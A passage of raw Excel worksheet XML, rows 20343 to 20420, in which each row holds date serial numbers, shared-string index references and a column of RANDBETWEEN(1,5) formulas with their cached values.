    <row r="20343" spans="1:6" ht="135" x14ac:dyDescent="0.25">
      <c r="A20343" s="1">
        <v>43118.558761574073</v>
      </c>
      <c r="C20343" t="s">
        <v>10</v>
      </c>
      <c r="D20343" t="s">
        <v>107</v>
      </c>
      <c r="E20343" s="2" t="s">
        <v>18292</v>
      </c>
      <c r="F20343">
        <f t="shared" ca="1" si="317"/>
        <v>5</v>
      </c>
    </row>
    <row r="20344" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20344" s="1">
        <v>43118.540555555555</v>
      </c>
      <c r="C20344" t="s">
        <v>10</v>
      </c>
      <c r="D20344" t="s">
        <v>36</v>
      </c>
      <c r="E20344" t="s">
        <v>18293</v>
      </c>
      <c r="F20344">
        <f t="shared" ca="1" si="317"/>
        <v>4</v>
      </c>
    </row>
    <row r="20345" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20345" s="1">
        <v>43118.540543981479</v>
      </c>
      <c r="C20345" t="s">
        <v>10</v>
      </c>
      <c r="D20345" t="s">
        <v>36</v>
      </c>
      <c r="E20345" t="s">
        <v>18293</v>
      </c>
      <c r="F20345">
        <f t="shared" ca="1" si="317"/>
        <v>2</v>
      </c>
    </row>
    <row r="20346" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20346" s="1">
        <v>43118.540509259263</v>
      </c>
      <c r="C20346" t="s">
        <v>10</v>
      </c>
      <c r="D20346" t="s">
        <v>36</v>
      </c>
      <c r="E20346" t="s">
        <v>18293</v>
      </c>
      <c r="F20346">
        <f t="shared" ca="1" si="317"/>
        <v>4</v>
      </c>
    </row>
    <row r="20347" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A20347" s="1">
        <v>43118.525856481479</v>
      </c>
      <c r="C20347" t="s">
        <v>10</v>
      </c>
      <c r="D20347" t="s">
        <v>11</v>
      </c>
      <c r="E20347" s="2" t="s">
        <v>18294</v>
      </c>
      <c r="F20347">
        <f t="shared" ca="1" si="317"/>
        <v>2</v>
      </c>
    </row>
    <row r="20348" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20348" s="1">
        <v>43118.517696759256</v>
      </c>
      <c r="C20348" t="s">
        <v>10</v>
      </c>
      <c r="D20348" t="s">
        <v>222</v>
      </c>
      <c r="E20348" t="s">
        <v>18295</v>
      </c>
      <c r="F20348">
        <f t="shared" ca="1" si="317"/>
        <v>5</v>
      </c>
    </row>
    <row r="20349" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20349" s="1">
        <v>43118.509791666664</v>
      </c>
      <c r="C20349" t="s">
        <v>10</v>
      </c>
      <c r="D20349" t="s">
        <v>271</v>
      </c>
      <c r="E20349" t="s">
        <v>18296</v>
      </c>
      <c r="F20349">
        <f t="shared" ca="1" si="317"/>
        <v>1</v>
      </c>
    </row>
    <row r="20350" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20350" s="1">
        <v>43118.49695601852</v>
      </c>
      <c r="C20350" t="s">
        <v>10</v>
      </c>
      <c r="D20350" t="s">
        <v>46</v>
      </c>
      <c r="E20350" t="s">
        <v>18297</v>
      </c>
      <c r="F20350">
        <f t="shared" ca="1" si="317"/>
        <v>2</v>
      </c>
    </row>
    <row r="20351" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20351" s="1">
        <v>43118.470405092594</v>
      </c>
      <c r="C20351" t="s">
        <v>41</v>
      </c>
      <c r="E20351" t="s">
        <v>18298</v>
      </c>
      <c r="F20351">
        <f t="shared" ca="1" si="317"/>
        <v>2</v>
      </c>
    </row>
    <row r="20352" spans="1:6" ht="195" x14ac:dyDescent="0.25">
      <c r="A20352" s="1">
        <v>43118.46638888889</v>
      </c>
      <c r="C20352" t="s">
        <v>65</v>
      </c>
      <c r="E20352" s="2" t="s">
        <v>18299</v>
      </c>
      <c r="F20352">
        <f t="shared" ca="1" si="317"/>
        <v>3</v>
      </c>
    </row>
    <row r="20353" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20353" s="1">
        <v>43118.464467592596</v>
      </c>
      <c r="C20353" t="s">
        <v>10</v>
      </c>
      <c r="D20353" t="s">
        <v>92</v>
      </c>
      <c r="E20353" t="s">
        <v>18300</v>
      </c>
      <c r="F20353">
        <f t="shared" ca="1" si="317"/>
        <v>2</v>
      </c>
    </row>
    <row r="20354" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20354" s="1">
        <v>43118.435578703706</v>
      </c>
      <c r="C20354" t="s">
        <v>10</v>
      </c>
      <c r="D20354" t="s">
        <v>41</v>
      </c>
      <c r="E20354" t="s">
        <v>18301</v>
      </c>
      <c r="F20354">
        <f t="shared" ref="F20354:F20417" ca="1" si="318">RANDBETWEEN(1,5)</f>
        <v>2</v>
      </c>
    </row>
    <row r="20355" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20355" s="1">
        <v>43118.419282407405</v>
      </c>
      <c r="C20355" t="s">
        <v>10</v>
      </c>
      <c r="D20355" t="s">
        <v>20</v>
      </c>
      <c r="E20355" t="s">
        <v>18302</v>
      </c>
      <c r="F20355">
        <f t="shared" ca="1" si="318"/>
        <v>3</v>
      </c>
    </row>
    <row r="20356" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A20356" s="1">
        <v>43118.389768518522</v>
      </c>
      <c r="C20356" t="s">
        <v>10</v>
      </c>
      <c r="D20356" t="s">
        <v>80</v>
      </c>
      <c r="E20356" s="2" t="s">
        <v>18303</v>
      </c>
      <c r="F20356">
        <f t="shared" ca="1" si="318"/>
        <v>1</v>
      </c>
    </row>
    <row r="20357" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A20357" s="1">
        <v>43118.37096064815</v>
      </c>
      <c r="C20357" t="s">
        <v>71</v>
      </c>
      <c r="E20357" s="2" t="s">
        <v>18304</v>
      </c>
      <c r="F20357">
        <f t="shared" ca="1" si="318"/>
        <v>4</v>
      </c>
    </row>
    <row r="20358" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20358" s="1">
        <v>43118.366087962961</v>
      </c>
      <c r="C20358" t="s">
        <v>10</v>
      </c>
      <c r="D20358" t="s">
        <v>52</v>
      </c>
      <c r="E20358" t="s">
        <v>18305</v>
      </c>
      <c r="F20358">
        <f t="shared" ca="1" si="318"/>
        <v>2</v>
      </c>
    </row>
    <row r="20359" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A20359" s="1">
        <v>43118.364652777775</v>
      </c>
      <c r="C20359" t="s">
        <v>48</v>
      </c>
      <c r="E20359" s="2" t="s">
        <v>18306</v>
      </c>
      <c r="F20359">
        <f t="shared" ca="1" si="318"/>
        <v>3</v>
      </c>
    </row>
    <row r="20360" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A20360" s="1">
        <v>43118.354930555557</v>
      </c>
      <c r="C20360" t="s">
        <v>586</v>
      </c>
      <c r="D20360" t="s">
        <v>94</v>
      </c>
      <c r="E20360" s="2" t="s">
        <v>18307</v>
      </c>
      <c r="F20360">
        <f t="shared" ca="1" si="318"/>
        <v>3</v>
      </c>
    </row>
    <row r="20361" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A20361" s="1">
        <v>43118.354629629626</v>
      </c>
      <c r="C20361" t="s">
        <v>10</v>
      </c>
      <c r="D20361" t="s">
        <v>112</v>
      </c>
      <c r="E20361" s="2" t="s">
        <v>18308</v>
      </c>
      <c r="F20361">
        <f t="shared" ca="1" si="318"/>
        <v>1</v>
      </c>
    </row>
    <row r="20362" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A20362" s="1">
        <v>43118.349212962959</v>
      </c>
      <c r="C20362" t="s">
        <v>10</v>
      </c>
      <c r="E20362" s="2" t="s">
        <v>18309</v>
      </c>
      <c r="F20362">
        <f t="shared" ca="1" si="318"/>
        <v>3</v>
      </c>
    </row>
    <row r="20363" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20363" s="1">
        <v>43118.33829861111</v>
      </c>
      <c r="C20363" t="s">
        <v>10</v>
      </c>
      <c r="D20363" t="s">
        <v>52</v>
      </c>
      <c r="E20363" t="s">
        <v>18310</v>
      </c>
      <c r="F20363">
        <f t="shared" ca="1" si="318"/>
        <v>5</v>
      </c>
    </row>
    <row r="20364" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A20364" s="1">
        <v>43118.314236111109</v>
      </c>
      <c r="C20364" t="s">
        <v>10</v>
      </c>
      <c r="D20364" t="s">
        <v>263</v>
      </c>
      <c r="E20364" s="2" t="s">
        <v>18311</v>
      </c>
      <c r="F20364">
        <f t="shared" ca="1" si="318"/>
        <v>3</v>
      </c>
    </row>
    <row r="20365" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A20365" s="1">
        <v>43118.164606481485</v>
      </c>
      <c r="C20365" t="s">
        <v>197</v>
      </c>
      <c r="E20365" s="2" t="s">
        <v>18312</v>
      </c>
      <c r="F20365">
        <f t="shared" ca="1" si="318"/>
        <v>1</v>
      </c>
    </row>
    <row r="20366" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A20366" s="1">
        <v>43118.158634259256</v>
      </c>
      <c r="C20366" t="s">
        <v>71</v>
      </c>
      <c r="E20366" s="2" t="s">
        <v>18313</v>
      </c>
      <c r="F20366">
        <f t="shared" ca="1" si="318"/>
        <v>1</v>
      </c>
    </row>
    <row r="20367" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20367" s="1">
        <v>43118.122499999998</v>
      </c>
      <c r="C20367" t="s">
        <v>410</v>
      </c>
      <c r="E20367" t="s">
        <v>18314</v>
      </c>
      <c r="F20367">
        <f t="shared" ca="1" si="318"/>
        <v>1</v>
      </c>
    </row>
    <row r="20368" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A20368" s="1">
        <v>43118.085162037038</v>
      </c>
      <c r="C20368" t="s">
        <v>71</v>
      </c>
      <c r="E20368" s="2" t="s">
        <v>18315</v>
      </c>
      <c r="F20368">
        <f t="shared" ca="1" si="318"/>
        <v>4</v>
      </c>
    </row>
    <row r="20369" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A20369" s="1">
        <v>43118.062025462961</v>
      </c>
      <c r="C20369" t="s">
        <v>253</v>
      </c>
      <c r="E20369" s="2" t="s">
        <v>18316</v>
      </c>
      <c r="F20369">
        <f t="shared" ca="1" si="318"/>
        <v>1</v>
      </c>
    </row>
    <row r="20370" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20370" s="1">
        <v>43117.937800925924</v>
      </c>
      <c r="C20370" t="s">
        <v>6</v>
      </c>
      <c r="D20370" t="s">
        <v>25</v>
      </c>
      <c r="E20370" t="s">
        <v>18317</v>
      </c>
      <c r="F20370">
        <f t="shared" ca="1" si="318"/>
        <v>5</v>
      </c>
    </row>
    <row r="20371" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20371" s="1">
        <v>43117.925787037035</v>
      </c>
      <c r="C20371" t="s">
        <v>41</v>
      </c>
      <c r="E20371" t="s">
        <v>18318</v>
      </c>
      <c r="F20371">
        <f t="shared" ca="1" si="318"/>
        <v>3</v>
      </c>
    </row>
    <row r="20372" spans="1:6" ht="270" x14ac:dyDescent="0.25">
      <c r="A20372" s="1">
        <v>43117.747511574074</v>
      </c>
      <c r="C20372" t="s">
        <v>140</v>
      </c>
      <c r="D20372" t="s">
        <v>141</v>
      </c>
      <c r="E20372" s="2" t="s">
        <v>18319</v>
      </c>
      <c r="F20372">
        <f t="shared" ca="1" si="318"/>
        <v>3</v>
      </c>
    </row>
    <row r="20373" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20373" s="1">
        <v>43117.712245370371</v>
      </c>
      <c r="C20373" t="s">
        <v>10</v>
      </c>
      <c r="D20373" t="s">
        <v>290</v>
      </c>
      <c r="E20373" t="s">
        <v>18320</v>
      </c>
      <c r="F20373">
        <f t="shared" ca="1" si="318"/>
        <v>1</v>
      </c>
    </row>
    <row r="20374" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20374" s="1">
        <v>43117.704722222225</v>
      </c>
      <c r="C20374" t="s">
        <v>10</v>
      </c>
      <c r="D20374" t="s">
        <v>6</v>
      </c>
      <c r="E20374" t="s">
        <v>18321</v>
      </c>
      <c r="F20374">
        <f t="shared" ca="1" si="318"/>
        <v>4</v>
      </c>
    </row>
    <row r="20375" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20375" s="1">
        <v>43117.698599537034</v>
      </c>
      <c r="C20375" t="s">
        <v>10</v>
      </c>
      <c r="D20375" t="s">
        <v>178</v>
      </c>
      <c r="E20375" t="s">
        <v>18322</v>
      </c>
      <c r="F20375">
        <f t="shared" ca="1" si="318"/>
        <v>1</v>
      </c>
    </row>
    <row r="20376" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20376" s="1">
        <v>43117.691388888888</v>
      </c>
      <c r="C20376" t="s">
        <v>10</v>
      </c>
      <c r="D20376" t="s">
        <v>6</v>
      </c>
      <c r="E20376" t="s">
        <v>18323</v>
      </c>
      <c r="F20376">
        <f t="shared" ca="1" si="318"/>
        <v>2</v>
      </c>
    </row>
    <row r="20377" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20377" s="1">
        <v>43117.684537037036</v>
      </c>
      <c r="C20377" t="s">
        <v>10</v>
      </c>
      <c r="D20377" t="s">
        <v>36</v>
      </c>
      <c r="E20377" t="s">
        <v>18324</v>
      </c>
      <c r="F20377">
        <f t="shared" ca="1" si="318"/>
        <v>3</v>
      </c>
    </row>
    <row r="20378" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20378" s="1">
        <v>43117.669305555559</v>
      </c>
      <c r="C20378" t="s">
        <v>10</v>
      </c>
      <c r="D20378" t="s">
        <v>17</v>
      </c>
      <c r="E20378" t="s">
        <v>18325</v>
      </c>
      <c r="F20378">
        <f t="shared" ca="1" si="318"/>
        <v>2</v>
      </c>
    </row>
    <row r="20379" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20379" s="1">
        <v>43117.654687499999</v>
      </c>
      <c r="C20379" t="s">
        <v>10</v>
      </c>
      <c r="D20379" t="s">
        <v>17</v>
      </c>
      <c r="E20379" t="s">
        <v>18326</v>
      </c>
      <c r="F20379">
        <f t="shared" ca="1" si="318"/>
        <v>5</v>
      </c>
    </row>
    <row r="20380" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A20380" s="1">
        <v>43117.64329861111</v>
      </c>
      <c r="C20380" t="s">
        <v>10</v>
      </c>
      <c r="D20380" t="s">
        <v>6</v>
      </c>
      <c r="E20380" s="2" t="s">
        <v>18327</v>
      </c>
      <c r="F20380">
        <f t="shared" ca="1" si="318"/>
        <v>2</v>
      </c>
    </row>
    <row r="20381" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20381" s="1">
        <v>43117.641736111109</v>
      </c>
      <c r="C20381" t="s">
        <v>10</v>
      </c>
      <c r="D20381" t="s">
        <v>494</v>
      </c>
      <c r="E20381" t="s">
        <v>18328</v>
      </c>
      <c r="F20381">
        <f t="shared" ca="1" si="318"/>
        <v>1</v>
      </c>
    </row>
    <row r="20382" spans="1:6" ht="210" x14ac:dyDescent="0.25">
      <c r="A20382" s="1">
        <v>43117.634525462963</v>
      </c>
      <c r="C20382" t="s">
        <v>10</v>
      </c>
      <c r="D20382" t="s">
        <v>20</v>
      </c>
      <c r="E20382" s="2" t="s">
        <v>18329</v>
      </c>
      <c r="F20382">
        <f t="shared" ca="1" si="318"/>
        <v>2</v>
      </c>
    </row>
    <row r="20383" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20383" s="1">
        <v>43117.624201388891</v>
      </c>
      <c r="C20383" t="s">
        <v>6</v>
      </c>
      <c r="D20383" t="s">
        <v>25</v>
      </c>
      <c r="E20383" t="s">
        <v>18330</v>
      </c>
      <c r="F20383">
        <f t="shared" ca="1" si="318"/>
        <v>3</v>
      </c>
    </row>
    <row r="20384" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20384" s="1">
        <v>43117.600902777776</v>
      </c>
      <c r="C20384" t="s">
        <v>10</v>
      </c>
      <c r="D20384" t="s">
        <v>112</v>
      </c>
      <c r="E20384" t="s">
        <v>18331</v>
      </c>
      <c r="F20384">
        <f t="shared" ca="1" si="318"/>
        <v>2</v>
      </c>
    </row>
    <row r="20385" spans="1:6" ht="240" x14ac:dyDescent="0.25">
      <c r="A20385" s="1">
        <v>43117.581284722219</v>
      </c>
      <c r="C20385" t="s">
        <v>48</v>
      </c>
      <c r="D20385" t="s">
        <v>312</v>
      </c>
      <c r="E20385" s="2" t="s">
        <v>18332</v>
      </c>
      <c r="F20385">
        <f t="shared" ca="1" si="318"/>
        <v>3</v>
      </c>
    </row>
    <row r="20386" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A20386" s="1">
        <v>43117.56621527778</v>
      </c>
      <c r="C20386" t="s">
        <v>10</v>
      </c>
      <c r="D20386" t="s">
        <v>112</v>
      </c>
      <c r="E20386" s="2" t="s">
        <v>18333</v>
      </c>
      <c r="F20386">
        <f t="shared" ca="1" si="318"/>
        <v>1</v>
      </c>
    </row>
    <row r="20387" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20387" s="1">
        <v>43117.561932870369</v>
      </c>
      <c r="C20387" t="s">
        <v>10</v>
      </c>
      <c r="D20387" t="s">
        <v>290</v>
      </c>
      <c r="E20387" t="s">
        <v>18334</v>
      </c>
      <c r="F20387">
        <f t="shared" ca="1" si="318"/>
        <v>1</v>
      </c>
    </row>
    <row r="20388" spans="1:6" ht="240" x14ac:dyDescent="0.25">
      <c r="A20388" s="1">
        <v>43117.556250000001</v>
      </c>
      <c r="C20388" t="s">
        <v>10</v>
      </c>
      <c r="D20388" t="s">
        <v>6</v>
      </c>
      <c r="E20388" s="2" t="s">
        <v>18335</v>
      </c>
      <c r="F20388">
        <f t="shared" ca="1" si="318"/>
        <v>3</v>
      </c>
    </row>
    <row r="20389" spans="1:6" ht="345" x14ac:dyDescent="0.25">
      <c r="A20389" s="1">
        <v>43117.554884259262</v>
      </c>
      <c r="C20389" t="s">
        <v>10</v>
      </c>
      <c r="D20389" t="s">
        <v>89</v>
      </c>
      <c r="E20389" s="2" t="s">
        <v>18336</v>
      </c>
      <c r="F20389">
        <f t="shared" ca="1" si="318"/>
        <v>2</v>
      </c>
    </row>
    <row r="20390" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20390" s="1">
        <v>43117.542638888888</v>
      </c>
      <c r="C20390" t="s">
        <v>41</v>
      </c>
      <c r="E20390" t="s">
        <v>18337</v>
      </c>
      <c r="F20390">
        <f t="shared" ca="1" si="318"/>
        <v>2</v>
      </c>
    </row>
    <row r="20391" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20391" s="1">
        <v>43117.518726851849</v>
      </c>
      <c r="C20391" t="s">
        <v>10</v>
      </c>
      <c r="D20391" t="s">
        <v>11</v>
      </c>
      <c r="E20391" t="s">
        <v>18338</v>
      </c>
      <c r="F20391">
        <f t="shared" ca="1" si="318"/>
        <v>4</v>
      </c>
    </row>
    <row r="20392" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20392" s="1">
        <v>43117.480162037034</v>
      </c>
      <c r="C20392" t="s">
        <v>6</v>
      </c>
      <c r="D20392" t="s">
        <v>114</v>
      </c>
      <c r="E20392" t="s">
        <v>18339</v>
      </c>
      <c r="F20392">
        <f t="shared" ca="1" si="318"/>
        <v>3</v>
      </c>
    </row>
    <row r="20393" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20393" s="1">
        <v>43117.460798611108</v>
      </c>
      <c r="C20393" t="s">
        <v>2140</v>
      </c>
      <c r="E20393" t="s">
        <v>18340</v>
      </c>
      <c r="F20393">
        <f t="shared" ca="1" si="318"/>
        <v>1</v>
      </c>
    </row>
    <row r="20394" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A20394" s="1">
        <v>43117.443368055552</v>
      </c>
      <c r="C20394" t="s">
        <v>43</v>
      </c>
      <c r="E20394" s="2" t="s">
        <v>18341</v>
      </c>
      <c r="F20394">
        <f t="shared" ca="1" si="318"/>
        <v>5</v>
      </c>
    </row>
    <row r="20395" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20395" s="1">
        <v>43117.408634259256</v>
      </c>
      <c r="C20395" t="s">
        <v>10</v>
      </c>
      <c r="D20395" t="s">
        <v>151</v>
      </c>
      <c r="E20395" t="s">
        <v>18342</v>
      </c>
      <c r="F20395">
        <f t="shared" ca="1" si="318"/>
        <v>2</v>
      </c>
    </row>
    <row r="20396" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A20396" s="1">
        <v>43117.361342592594</v>
      </c>
      <c r="C20396" t="s">
        <v>430</v>
      </c>
      <c r="D20396" t="s">
        <v>312</v>
      </c>
      <c r="E20396" s="2" t="s">
        <v>18343</v>
      </c>
      <c r="F20396">
        <f t="shared" ca="1" si="318"/>
        <v>1</v>
      </c>
    </row>
    <row r="20397" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A20397" s="1">
        <v>43117.339386574073</v>
      </c>
      <c r="C20397" t="s">
        <v>10</v>
      </c>
      <c r="E20397" s="2" t="s">
        <v>18344</v>
      </c>
      <c r="F20397">
        <f t="shared" ca="1" si="318"/>
        <v>4</v>
      </c>
    </row>
    <row r="20398" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A20398" s="1">
        <v>43117.33766203704</v>
      </c>
      <c r="C20398" t="s">
        <v>10</v>
      </c>
      <c r="D20398" t="s">
        <v>6</v>
      </c>
      <c r="E20398" s="2" t="s">
        <v>18345</v>
      </c>
      <c r="F20398">
        <f t="shared" ca="1" si="318"/>
        <v>4</v>
      </c>
    </row>
    <row r="20399" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20399" s="1">
        <v>43117.324004629627</v>
      </c>
      <c r="C20399" t="s">
        <v>50</v>
      </c>
      <c r="E20399" t="s">
        <v>18346</v>
      </c>
      <c r="F20399">
        <f t="shared" ca="1" si="318"/>
        <v>4</v>
      </c>
    </row>
    <row r="20400" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20400" s="1">
        <v>43117.314212962963</v>
      </c>
      <c r="C20400" t="s">
        <v>71</v>
      </c>
      <c r="D20400" t="s">
        <v>312</v>
      </c>
      <c r="E20400" t="s">
        <v>18347</v>
      </c>
      <c r="F20400">
        <f t="shared" ca="1" si="318"/>
        <v>4</v>
      </c>
    </row>
    <row r="20401" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20401" s="1">
        <v>43117.308912037035</v>
      </c>
      <c r="C20401" t="s">
        <v>10</v>
      </c>
      <c r="D20401" t="s">
        <v>271</v>
      </c>
      <c r="E20401" t="s">
        <v>18348</v>
      </c>
      <c r="F20401">
        <f t="shared" ca="1" si="318"/>
        <v>3</v>
      </c>
    </row>
    <row r="20402" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20402" s="1">
        <v>43117.300312500003</v>
      </c>
      <c r="C20402" t="s">
        <v>71</v>
      </c>
      <c r="E20402" t="s">
        <v>18349</v>
      </c>
      <c r="F20402">
        <f t="shared" ca="1" si="318"/>
        <v>5</v>
      </c>
    </row>
    <row r="20403" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20403" s="1">
        <v>43117.273819444446</v>
      </c>
      <c r="C20403" t="s">
        <v>197</v>
      </c>
      <c r="E20403" t="s">
        <v>18350</v>
      </c>
      <c r="F20403">
        <f t="shared" ca="1" si="318"/>
        <v>5</v>
      </c>
    </row>
    <row r="20404" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20404" s="1">
        <v>43117.212256944447</v>
      </c>
      <c r="C20404" t="s">
        <v>41</v>
      </c>
      <c r="E20404" t="s">
        <v>18351</v>
      </c>
      <c r="F20404">
        <f t="shared" ca="1" si="318"/>
        <v>4</v>
      </c>
    </row>
    <row r="20405" spans="1:6" ht="240" x14ac:dyDescent="0.25">
      <c r="A20405" s="1">
        <v>43117.208645833336</v>
      </c>
      <c r="C20405" t="s">
        <v>48</v>
      </c>
      <c r="E20405" s="2" t="s">
        <v>18352</v>
      </c>
      <c r="F20405">
        <f t="shared" ca="1" si="318"/>
        <v>4</v>
      </c>
    </row>
    <row r="20406" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A20406" s="1">
        <v>43117.204664351855</v>
      </c>
      <c r="C20406" t="s">
        <v>229</v>
      </c>
      <c r="E20406" s="2" t="s">
        <v>18353</v>
      </c>
      <c r="F20406">
        <f t="shared" ca="1" si="318"/>
        <v>5</v>
      </c>
    </row>
    <row r="20407" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A20407" s="1">
        <v>43117.1952662037</v>
      </c>
      <c r="C20407" t="s">
        <v>253</v>
      </c>
      <c r="E20407" s="2" t="s">
        <v>18354</v>
      </c>
      <c r="F20407">
        <f t="shared" ca="1" si="318"/>
        <v>4</v>
      </c>
    </row>
    <row r="20408" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20408" s="1">
        <v>43117.194178240738</v>
      </c>
      <c r="C20408" t="s">
        <v>535</v>
      </c>
      <c r="E20408" t="s">
        <v>18355</v>
      </c>
      <c r="F20408">
        <f t="shared" ca="1" si="318"/>
        <v>2</v>
      </c>
    </row>
    <row r="20409" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A20409" s="1">
        <v>43117.189189814817</v>
      </c>
      <c r="C20409" t="s">
        <v>253</v>
      </c>
      <c r="E20409" s="2" t="s">
        <v>18354</v>
      </c>
      <c r="F20409">
        <f t="shared" ca="1" si="318"/>
        <v>4</v>
      </c>
    </row>
    <row r="20410" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A20410" s="1">
        <v>43117.188067129631</v>
      </c>
      <c r="C20410" t="s">
        <v>253</v>
      </c>
      <c r="E20410" s="2" t="s">
        <v>18354</v>
      </c>
      <c r="F20410">
        <f t="shared" ca="1" si="318"/>
        <v>4</v>
      </c>
    </row>
    <row r="20411" spans="1:6" ht="345" x14ac:dyDescent="0.25">
      <c r="A20411" s="1">
        <v>43117.170081018521</v>
      </c>
      <c r="C20411" t="s">
        <v>10</v>
      </c>
      <c r="D20411" t="s">
        <v>6</v>
      </c>
      <c r="E20411" s="2" t="s">
        <v>18356</v>
      </c>
      <c r="F20411">
        <f t="shared" ca="1" si="318"/>
        <v>3</v>
      </c>
    </row>
    <row r="20412" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A20412" s="1">
        <v>43117.121782407405</v>
      </c>
      <c r="C20412" t="s">
        <v>71</v>
      </c>
      <c r="E20412" s="2" t="s">
        <v>18357</v>
      </c>
      <c r="F20412">
        <f t="shared" ca="1" si="318"/>
        <v>4</v>
      </c>
    </row>
    <row r="20413" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20413" s="1">
        <v>43117.093738425923</v>
      </c>
      <c r="C20413" t="s">
        <v>7058</v>
      </c>
      <c r="E20413" t="s">
        <v>18358</v>
      </c>
      <c r="F20413">
        <f t="shared" ca="1" si="318"/>
        <v>1</v>
      </c>
    </row>
    <row r="20414" spans="1:6" ht="409.5" x14ac:dyDescent="0.25">
      <c r="A20414" s="1">
        <v>43117.047662037039</v>
      </c>
      <c r="C20414" t="s">
        <v>17</v>
      </c>
      <c r="E20414" s="2" t="s">
        <v>18359</v>
      </c>
      <c r="F20414">
        <f t="shared" ca="1" si="318"/>
        <v>1</v>
      </c>
    </row>
    <row r="20415" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A20415" s="1">
        <v>43117.014270833337</v>
      </c>
      <c r="C20415" t="s">
        <v>41</v>
      </c>
      <c r="E20415" s="2" t="s">
        <v>18360</v>
      </c>
      <c r="F20415">
        <f t="shared" ca="1" si="318"/>
        <v>5</v>
      </c>
    </row>
    <row r="20416" spans="1:6" ht="225" x14ac:dyDescent="0.25">
      <c r="A20416" s="1">
        <v>43116.966157407405</v>
      </c>
      <c r="C20416" t="s">
        <v>314</v>
      </c>
      <c r="E20416" s="2" t="s">
        <v>18361</v>
      </c>
      <c r="F20416">
        <f t="shared" ca="1" si="318"/>
        <v>2</v>
      </c>
    </row>
    <row r="20417" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20417" s="1">
        <v>43116.939270833333</v>
      </c>
      <c r="C20417" t="s">
        <v>301</v>
      </c>
      <c r="D20417" t="s">
        <v>885</v>
      </c>
      <c r="E20417" t="s">
        <v>18362</v>
      </c>
      <c r="F20417">
        <f t="shared" ca="1" si="318"/>
        <v>2</v>
      </c>
    </row>
    <row r="20418" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20418" s="1">
        <v>43116.909282407411</v>
      </c>
      <c r="C20418" t="s">
        <v>41</v>
      </c>
      <c r="E20418" t="s">
        <v>18363</v>
      </c>
      <c r="F20418">
        <f t="shared" ref="F20418:F20481" ca="1" si="319">RANDBETWEEN(1,5)</f>
        <v>2</v>
      </c>
    </row>
    <row r="20419" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A20419" s="1">
        <v>43116.872847222221</v>
      </c>
      <c r="C20419" t="s">
        <v>260</v>
      </c>
      <c r="E20419" s="2" t="s">
        <v>18364</v>
      </c>
      <c r="F20419">
        <f t="shared" ca="1" si="319"/>
        <v>5</v>
      </c>
    </row>
    <row r="20420" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20420" s="1">
        <v>43116.804942129631</v>
      </c>
      <c r="C20420" t="s">
        <v>10</v>
      </c>
      <c r="D20420" t="s">
        <v>46</v>
      </c>
      <c r="E20420" t="s">
        <v>18365</v>
      </c>
      <c r="F20420">
        <f t="shared" ca="1" si="319"/>
        <v>2</v>
